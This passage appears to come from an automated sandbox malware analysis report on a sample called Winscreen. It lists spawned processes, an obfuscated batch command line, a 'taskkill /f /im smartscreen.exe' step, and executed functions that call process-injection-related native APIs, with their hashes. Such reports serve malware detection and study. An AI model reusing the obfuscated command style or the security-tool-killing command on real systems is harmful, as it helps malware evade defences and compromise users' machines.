%a1zr:~17,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~18,1%%a1zr:~29,1%%a1zr:~18,1%%a1zr:~47,1%%a1zr:~52,1%%a1zr:~59,1%%a1zr:~35,1%%a1zr:~53,1%\%a1zr:~48,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%" /%a1zr:~28,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~0,1%%a1zr:~45,1%%a1zr:~55,1%%a1zr:~24,1%%a1zr:~6,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~21,1%%a1zr:~51,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~54,1%%a1zr:~45,1%%a1zr:~52,1%%a1zr:~47,1%\%a1zr:~21,1%%a1zr:~51,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~54,1%\%a1zr:~45,1%%a1zr:~52,1%%a1zr:~18,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1% %a1zr:~6,1%%a1zr:~15,1%%a1zr:~43,1%%a1zr:~15,1%%a1zr:~50,1%%a1zr:~52,1%%a1zr:~5,1%\%a1zr:~24,1%%a1zr:~43,1%%a1zr:~32,1%%a1zr:~26,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~43,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%" /%a1zr:~32,1% %a1zr:~21,1%%a1zr:~51,1%%a1zr:~59,1%%a1zr:~45,1%%a1zr:~37,1%%a1zr:~52,1%%a1zr:~22,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "" /%a1zr:~28,1% %a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~19,1%%a1zr:~26,1%%a1zr:~54,1%%a1zr:~54,1% /%a1zr:~28,1% /%a1zr:~26,1%%a1zr:~59,1% %a1zr:~18,1%%a1zr:~59,1%%a1zr:~15,1%%a1zr:~5,1%%a1zr:~47,1%%a1zr:~18,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1% %a1zr:~18,1%%a1zr:~47,1%%a1zr:~15,1%%a1zr:~5,1%%a1zr:~47,1% %a1zr:~21,1%:\%a1zr:~7,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~5,1%%a1zr:~15,1%%a1zr:~59,1%%a1zr:~34,1%%a1zr:~15,1%%a1zr:~47,1%%a1zr:~15,1%\%a1zr:~33,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%.%a1zr:~32,1%%a1zr:~12,1%%a1zr:~18,1%
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:61
                                                                                      Start time:15:58:15
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:62
                                                                                      Start time:15:58:15
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\taskmoder.exe"
                                                                                      Imagebase:0xf70000
                                                                                      File size:502'784 bytes
                                                                                      MD5 hash:2A48F51475C2EB426B304DDDCF3F85F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:63
                                                                                      Start time:15:58:16
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\taskkill.exe" /f /im smartscreen.exe
                                                                                      Imagebase:0xb80000
                                                                                      File size:74'240 bytes
                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:64
                                                                                      Start time:15:58:16
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:65
                                                                                      Start time:15:58:16
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\userinit.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\userinit.exe"
                                                                                      Imagebase:0xaf0000
                                                                                      File size:45'568 bytes
                                                                                      MD5 hash:24892AC6E39679E3BD3B0154DE97C53A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:66
                                                                                      Start time:15:58:16
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                      Imagebase:0x7ff674740000
                                                                                      File size:5'141'208 bytes
                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:67
                                                                                      Start time:15:58:17
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Windows\winsin.bat"
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:68
                                                                                      Start time:15:58:18
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.8%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:100%
                                                                                        Total number of Nodes:36
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 16273 7ff848f13ef8 16274 7ff848f13f01 NtProtectVirtualMemory 16273->16274 16276 7ff848f13ff5 16274->16276 16277 7ff848f14278 16278 7ff848f14281 NtUnmapViewOfSection 16277->16278 16280 7ff848f1432e 16278->16280 16313 7ff848f14ad8 16314 7ff848f14ae1 NtDeviceIoControlFile 16313->16314 16316 7ff848f14bfe 16314->16316 16285 7ff848f13c19 16286 7ff848f13c2f NtQueryInformationProcess 16285->16286 16288 7ff848f13cea 16286->16288 16297 7ff848f14029 16298 7ff848f14037 NtAllocateVirtualMemory 16297->16298 16300 7ff848f1412b 16298->16300 16309 7ff848f149c9 16310 7ff848f149d7 NtQueryVolumeInformationFile 16309->16310 16312 7ff848f14aa7 16310->16312 16289 7ff848f1449d 16290 7ff848f144ab NtOpenFile 16289->16290 16292 7ff848f145ae 16290->16292 16301 7ff848f1473d 16302 7ff848f1475f NtQuerySystemInformation 16301->16302 16304 7ff848f1480d 16302->16304 16293 7ff848f13d20 16294 7ff848f13d29 NtSetInformationThread 16293->16294 16296 7ff848f13de1 16294->16296 16305 7ff848f14840 16306 7ff848f14849 NtMapViewOfSection 16305->16306 16308 7ff848f14994 16306->16308 16317 7ff848f145e1 16318 7ff848f145ef NtCreateSection 16317->16318 16320 7ff848f14707 16318->16320 16281 7ff848f13e14 16282 7ff848f13e1d NtClose 16281->16282 16284 7ff848f13ec6 16282->16284

                                                                                        Executed Functions

                                                                                        Function 00007FF848F0DDA0 Relevance: 5.5, Strings: 3, Instructions: 1733COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8M x$BO_H$GO_H
                                                                                        • API String ID: 0-2480691311
                                                                                        • Opcode ID: fbda16610b0164f1db58707675f816b0fccada9dea623b66c21695fa0c450da3
                                                                                        • Instruction ID: 7079c39bcfcf911b65fac154f1da39c603ec8a20b63080924ecae497583fff4c
                                                                                        • Opcode Fuzzy Hash: fbda16610b0164f1db58707675f816b0fccada9dea623b66c21695fa0c450da3
                                                                                        • Instruction Fuzzy Hash: 28C2F430F18A0A8FEB98EB2C98D966977E2EF99340F444179D40EC73D2EE24AC458745
                                                                                        Function 00007FF848F1A3D8 Relevance: 3.4, Strings: 2, Instructions: 853COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 291 7ff848f1a3d8-7ff848f1b390 293 7ff848f1b395-7ff848f1b3c8 291->293 295 7ff848f1b3ce-7ff848f1b3fe 293->295 296 7ff848f1b483-7ff848f1b495 293->296 295->296 297 7ff848f1b49b-7ff848f1b4bb 296->297 298 7ff848f1b403-7ff848f1b41b 296->298 299 7ff848f1b52a-7ff848f1b5a0 297->299 300 7ff848f1b4bd-7ff848f1b4db 297->300 298->299 301 7ff848f1b421-7ff848f1b44a 298->301 312 7ff848f1b5ac-7ff848f1b5e3 299->312 313 7ff848f1b5a2-7ff848f1b5a7 call 7ff848f1ac18 299->313 300->293 302 7ff848f1b4e1-7ff848f1b508 300->302 301->299 303 7ff848f1b450-7ff848f1b47f 301->303 302->299 305 7ff848f1b50a-7ff848f1b51d 302->305 303->296 305->295 307 7ff848f1b523-7ff848f1b529 305->307 316 7ff848f1b5e9-7ff848f1b5f4 312->316 317 7ff848f1b7c8-7ff848f1b7dd 312->317 313->312 318 7ff848f1b668-7ff848f1b66d 316->318 319 7ff848f1b5f6-7ff848f1b604 316->319 327 7ff848f1b7df-7ff848f1b7e6 317->327 328 7ff848f1b7e7-7ff848f1b7fd 317->328 320 7ff848f1b66f-7ff848f1b679 318->320 321 7ff848f1b6d4-7ff848f1b6de 318->321 319->317 323 7ff848f1b60a-7ff848f1b619 319->323 320->317 326 7ff848f1b67f-7ff848f1b693 320->326 329 7ff848f1b700-7ff848f1b707 321->329 330 7ff848f1b6e0-7ff848f1b6ed call 7ff848f1ac38 321->330 324 7ff848f1b61b-7ff848f1b64b 323->324 325 7ff848f1b64d-7ff848f1b658 323->325 324->325 337 7ff848f1b695-7ff848f1b698 324->337 325->317 332 7ff848f1b65e-7ff848f1b666 325->332 333 7ff848f1b70a-7ff848f1b714 326->333 327->328 334 7ff848f1b7ff-7ff848f1b839 328->334 335 7ff848f1b7fe 328->335 329->333 344 7ff848f1b6f2-7ff848f1b6fe 330->344 332->318 332->319 333->317 338 7ff848f1b71a-7ff848f1b729 333->338 353 7ff848f1b83b-7ff848f1b841 334->353 354 7ff848f1b856-7ff848f1b880 334->354 335->334 341 7ff848f1b69a-7ff848f1b6aa 337->341 342 7ff848f1b6ae-7ff848f1b6b6 337->342 338->317 340 7ff848f1b72f-7ff848f1b73f 338->340 340->317 345 7ff848f1b745-7ff848f1b75b 340->345 341->342 342->317 346 7ff848f1b6bc-7ff848f1b6d3 342->346 344->329 345->317 348 7ff848f1b75d-7ff848f1b76b 345->348 350 7ff848f1b76d-7ff848f1b778 348->350 351 7ff848f1b7b6-7ff848f1b7c7 348->351 350->351 359 7ff848f1b77a-7ff848f1b7b1 call 7ff848f1ac38 350->359 355 7ff848f1b881-7ff848f1b8d5 353->355 356 7ff848f1b843-7ff848f1b854 353->356 368 7ff848f1b8e9-7ff848f1b921 355->368 369 7ff848f1b8d7-7ff848f1b8e7 355->369 356->353 356->354 359->351 373 7ff848f1b978-7ff848f1b97f 368->373 374 7ff848f1b923-7ff848f1b929 368->374 369->368 369->369 375 7ff848f1b981-7ff848f1b982 373->375 376 7ff848f1b9c2-7ff848f1b9eb 373->376 374->373 377 7ff848f1b92b-7ff848f1b92c 374->377 378 7ff848f1b985-7ff848f1b988 375->378 379 7ff848f1b92f-7ff848f1b932 377->379 380 7ff848f1b98a-7ff848f1b99b 378->380 381 7ff848f1b9ec-7ff848f1ba01 378->381 379->381 383 7ff848f1b938-7ff848f1b945 379->383 384 7ff848f1b9b9-7ff848f1b9c0 380->384 385 7ff848f1b99d-7ff848f1b9a3 380->385 392 7ff848f1ba0b-7ff848f1ba85 call 7ff848f00cf0 381->392 393 7ff848f1ba03-7ff848f1ba0a 381->393 386 7ff848f1b971-7ff848f1b976 383->386 387 7ff848f1b947-7ff848f1b96e 383->387 384->376 384->378 385->381 388 7ff848f1b9a5-7ff848f1b9b5 385->388 386->373 386->379 387->386 388->384 393->392
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d$mN_H
                                                                                        • API String ID: 0-3767165446
                                                                                        • Opcode ID: 20d0cdea817011fc151d774fb53dab939ab0cfb2cf9d8c396a71262eecf71371
                                                                                        • Instruction ID: 01ce9a32efffeb7559691d3477dc911300d69173976f27ea3bbdea2b485c7d07
                                                                                        • Opcode Fuzzy Hash: 20d0cdea817011fc151d774fb53dab939ab0cfb2cf9d8c396a71262eecf71371
                                                                                        • Instruction Fuzzy Hash: 49323431A2CA468FE31CEB289885571B7E1FF85354B1842BDD48BC75D7DA28BC438784
                                                                                        Function 00007FF848F00665 Relevance: 3.1, Strings: 2, Instructions: 611COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8M x$BO_H
                                                                                        • API String ID: 0-3523890398
                                                                                        • Opcode ID: 8ce5b63162cf7117014e2de38427e0bc6877c1322121f7375ae70bce9150727d
                                                                                        • Instruction ID: 6efea2273e733a032c0190a6e216076b94263174efe7b3b94068854fe2aa071d
                                                                                        • Opcode Fuzzy Hash: 8ce5b63162cf7117014e2de38427e0bc6877c1322121f7375ae70bce9150727d
                                                                                        • Instruction Fuzzy Hash: 4612F330F1CA0A4FEBA8EF2C98C567977D2FBA9340F544279D44EC72D6EE24AC418645
                                                                                        Function 00007FF848F031E7 Relevance: 2.2, Strings: 1, Instructions: 976COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: _U8/
                                                                                        • API String ID: 0-1679011089
                                                                                        • Opcode ID: d527be866745d949d9a7c7f4227bbbe52cb6c6b02583585f103197872e72c3e1
                                                                                        • Instruction ID: 9ecdef39ff9b6b1125aba1bd2123f5dabb38d1c9c7f0e4e98a9e9c489f35118c
                                                                                        • Opcode Fuzzy Hash: d527be866745d949d9a7c7f4227bbbe52cb6c6b02583585f103197872e72c3e1
                                                                                        • Instruction Fuzzy Hash: 9C524872F0EE4A4FE3587A2D581503963D3EFE5A50B45017ED40ADB3DBEE28AC468385
                                                                                        Function 00007FF848F02C34 Relevance: 1.8, Strings: 1, Instructions: 582COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0Y%$
                                                                                        • API String ID: 0-1727137460
                                                                                        • Opcode ID: 20dfff65a2a188bf08d8b0efa8af72bf2a542c53157c6d6b4399e7d8871562b4
                                                                                        • Instruction ID: ca3834b60aec3d14b4ee69cf86d783ca89b1e536a22b3e4b2a19b1291b6d993e
                                                                                        • Opcode Fuzzy Hash: 20dfff65a2a188bf08d8b0efa8af72bf2a542c53157c6d6b4399e7d8871562b4
                                                                                        • Instruction Fuzzy Hash: 46F16672F1EE4A4FE359BA2D580517923D2EFE5A90B45003AD40DDB3D7EE38AC468385
                                                                                        Function 00007FF848F00F91 Relevance: 1.8, Strings: 1, Instructions: 565COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <h*h
                                                                                        • API String ID: 0-4051642335
                                                                                        • Opcode ID: 7edbdc72fdc0ce0fac90d65f26fd0ad08b43f166657a1d591ea5b2e4e6ce7e96
                                                                                        • Instruction ID: e8f40f0583a84bfa671292886bd28814551a5e4c352b819980ad45302600a136
                                                                                        • Opcode Fuzzy Hash: 7edbdc72fdc0ce0fac90d65f26fd0ad08b43f166657a1d591ea5b2e4e6ce7e96
                                                                                        • Instruction Fuzzy Hash: 95F12572F0EE4A5FE758AA2C580517973D2EFD5780B45017AD40ACB3DBEE28AC468744
                                                                                        Function 00007FF848F1093F Relevance: 1.7, Strings: 1, Instructions: 498COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1049 7ff848f1093f-7ff848f10942 1051 7ff848f1097b 1049->1051 1052 7ff848f10944-7ff848f10962 1049->1052 1053 7ff848f1097c-7ff848f109a3 1051->1053 1055 7ff848f109be-7ff848f109d5 1051->1055 1052->1053 1054 7ff848f10964-7ff848f10976 1052->1054 1056 7ff848f109a9-7ff848f109b9 1053->1056 1057 7ff848f10752-7ff848f10758 1053->1057 1054->1051 1062 7ff848f109dc-7ff848f10a03 1055->1062 1056->1055 1061 7ff848f1071d-7ff848f1074b 1056->1061 1059 7ff848f10878 1057->1059 1060 7ff848f1075e-7ff848f10784 call 7ff848f08de0 1057->1060 1065 7ff848f1087d-7ff848f108b8 1059->1065 1069 7ff848f10789-7ff848f1079f 1060->1069 1061->1061 1063 7ff848f1074d 1061->1063 1066 7ff848f10a07-7ff848f10a1d 1062->1066 1063->1053 1073 7ff848f108bb-7ff848f108dc 1065->1073 1066->1061 1068 7ff848f10a23-7ff848f10a35 1066->1068 1071 7ff848f10a8e-7ff848f10a90 1068->1071 1072 7ff848f10a37-7ff848f10a3a 1068->1072 1069->1073 1087 7ff848f107a5-7ff848f107b0 1069->1087 1078 7ff848f10b11-7ff848f10b1a 1071->1078 1079 7ff848f10a92-7ff848f10a96 1071->1079 1076 7ff848f10abb 1072->1076 1077 7ff848f10a3c-7ff848f10a3e 1072->1077 1074 7ff848f10abd-7ff848f10ac0 1073->1074 1075 7ff848f108e2-7ff848f1093e call 7ff848f0ad20 1073->1075 1074->1061 1075->1049 1084 7ff848f10b1e-7ff848f10b34 1076->1084 1082 7ff848f10aba 1077->1082 1083 7ff848f10a40 1077->1083 1085 7ff848f10a98 1079->1085 1086 7ff848f10b07-7ff848f10b0f 1079->1086 1082->1076 1092 7ff848f10a82-7ff848f10a89 1083->1092 1093 7ff848f10a42-7ff848f10a70 1083->1093 1095 7ff848f10ab6 1084->1095 1096 7ff848f10b36 1084->1096 1085->1095 1086->1078 1089 7ff848f1086c-7ff848f10873 1087->1089 1090 7ff848f107b6-7ff848f107c9 1087->1090 1089->1069 1090->1065 1109 7ff848f107cf-7ff848f1082c call 7ff848f0ab00 1090->1109 1092->1071 1097 7ff848f10ac9-7ff848f10afd 1093->1097 1098 7ff848f10a72-7ff848f10a80 1093->1098 1095->1082 1101 7ff848f10b38-7ff848f10b3a 1096->1101 1102 7ff848f10b95-7ff848f10ba1 1096->1102 1097->1059 1114 7ff848f10b03-7ff848f10b06 1097->1114 1098->1092 1107 7ff848f10b3c-7ff848f10b45 1101->1107 1108 7ff848f10ac5-7ff848f10ac6 1101->1108 1111 7ff848f10beb-7ff848f10bf7 1102->1111 1112 7ff848f10ba3-7ff848f10bcf call 7ff848f0fd90 1102->1112 1107->1084 1113 7ff848f10b47-7ff848f10b8e call 7ff848f0ba30 call 7ff848f08370 call 7ff848f10b8f 1107->1113 1108->1097 1109->1089 1116 7ff848f10bf9-7ff848f10c01 1111->1116 1117 7ff848f10c02-7ff848f10c43 1111->1117 1114->1086 1116->1117
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: A~'/
                                                                                        • API String ID: 0-764881442
                                                                                        • Opcode ID: f8abdf770b7f9564de2e9febfebfadaabd11bc9e365d4bca28f572646f68563e
                                                                                        • Instruction ID: b47277eee49660119adc72a0c58ab158ae306e6707a22dd5e6f8ba64bdd7183e
                                                                                        • Opcode Fuzzy Hash: f8abdf770b7f9564de2e9febfebfadaabd11bc9e365d4bca28f572646f68563e
                                                                                        • Instruction Fuzzy Hash: 18E1E230E1C6198FEB5CFB2888566A977E1FF95340F1441BDD84AC72D2DE24AC46CB85
                                                                                        Function 00007FF848F14840 Relevance: 1.7, APIs: 1, Instructions: 179nativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1133 7ff848f14840-7ff848f14847 1134 7ff848f14849-7ff848f14851 1133->1134 1135 7ff848f14852-7ff848f14992 NtMapViewOfSection 1133->1135 1134->1135 1140 7ff848f1499a-7ff848f149c5 1135->1140 1141 7ff848f14994 1135->1141 1141->1140
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionView
                                                                                        • String ID:
                                                                                        • API String ID: 1323581903-0
                                                                                        • Opcode ID: b4caff62b50a5182092451507f36a038e43517e4730871f49bafaa3283254d85
                                                                                        • Instruction ID: 59a98785011cb6b9ba536a5699decd64476115ee8a8d99f17a077a70a3955b69
                                                                                        • Opcode Fuzzy Hash: b4caff62b50a5182092451507f36a038e43517e4730871f49bafaa3283254d85
                                                                                        • Instruction Fuzzy Hash: 8551907091CB4C8FDB58EF5898466ADBBF1FB99320F10426EE449D3256CB30A8458BC6
                                                                                        Function 00007FF848F145E1 Relevance: 1.7, APIs: 1, Instructions: 161nativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1143 7ff848f145e1-7ff848f145ed 1144 7ff848f145f8-7ff848f14705 NtCreateSection 1143->1144 1145 7ff848f145ef-7ff848f145f7 1143->1145 1150 7ff848f1470d-7ff848f14738 1144->1150 1151 7ff848f14707 1144->1151 1145->1144 1151->1150
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateSection
                                                                                        • String ID:
                                                                                        • API String ID: 2449625523-0
                                                                                        • Opcode ID: 3daa1cd2eff9ac6e8d7f98dccd1414e1a686986ac4c53993a57a6bb0b799858b
                                                                                        • Instruction ID: 720c5d53eb82ebadcb3262be1df0d800cd3a4d74e48d2b14ed228692f11ef5e2
                                                                                        • Opcode Fuzzy Hash: 3daa1cd2eff9ac6e8d7f98dccd1414e1a686986ac4c53993a57a6bb0b799858b
                                                                                        • Instruction Fuzzy Hash: 8041C23190CB4C8FDB58EF5898456ED7BE1EB99320F00426FE44DD3292CB75A8458B86
                                                                                        Function 00007FF848F14AD8 Relevance: 1.7, APIs: 1, Instructions: 158filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1153 7ff848f14ad8-7ff848f14adf 1154 7ff848f14aea-7ff848f14bfc NtDeviceIoControlFile 1153->1154 1155 7ff848f14ae1-7ff848f14ae9 1153->1155 1159 7ff848f14bfe 1154->1159 1160 7ff848f14c04-7ff848f14c2f 1154->1160 1155->1154 1159->1160
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2477220100.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff848f00000_Winscreen.jbxd
                                                                                        Similarity
                                                                                        • API ID: ControlDeviceFile
                                                                                        • String ID:
                                                                                        • API String ID: 3512290074-0
                                                                                        • Opcode ID: 66647c83c3251a336a26a2a74f8f9a9d17154b26e7bf412bea2bbcbdbc598f50
                                                                                        • Instruction ID: 577d4affbd7d2e4f0ca0c83db24a3778d8a61a0a7e68deafa77243cbe632b2ea
                                                                                        • Opcode Fuzzy Hash: 66647c83c3251a336a26a2a74f8f9a9d17154b26e7bf412bea2bbcbdbc598f50
